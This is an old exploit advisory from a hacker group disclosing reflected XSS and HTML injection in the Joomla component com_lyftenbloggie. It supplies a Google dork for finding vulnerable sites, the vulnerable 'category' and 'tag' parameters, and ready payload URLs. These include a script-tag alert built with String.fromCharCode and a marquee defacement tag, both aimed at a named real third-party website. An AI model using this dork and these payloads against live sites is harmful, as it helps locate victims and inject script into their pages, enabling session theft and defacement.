#################################################################### # Joomla Component (com_lyftenbloggie) XSS/HTML Vulnerability # #################################################################### =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-= #################################################################### # Name: Joomla Component (com_lyftenbloggie) XSS/HTML Vulnerability # Vendor: http://www.lyften.com/products/lyften-bloggie.html # Date: 2010-12-16 # Author: Ashiyane Digital Security Team # Contact: XroGuE ~> Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com # Home: www.Ashiyane.org/forums/ # Gr33tz: Behrooz_Ice,Virangar,And All Ashiyane Members ! #################################################################### [+] Dork: inurl:"index.php?option=com_lyftenbloggie" #################################################################### [+] vuln: http://127.0.0.1/index.php?option=com_lyftenbloggie&category=[XSS/HTML] [+] vuln: http://127.0.0.1/index.php?option=com_lyftenbloggie&tag=[XSS/HTML] [+] XSS: http://www.nastel.com/index.php?option=com_lyftenbloggie&tag=<script>var XroG= String.fromCharCode(88, 114, 111, 71, 117, 69);alert(XroG)</script> [+] HTML: http://www.nastel.com/index.php?option=com_lyftenbloggie&tag=<marquee><font color=Blue size=15>XroGuE</font></marquee> ####################################################################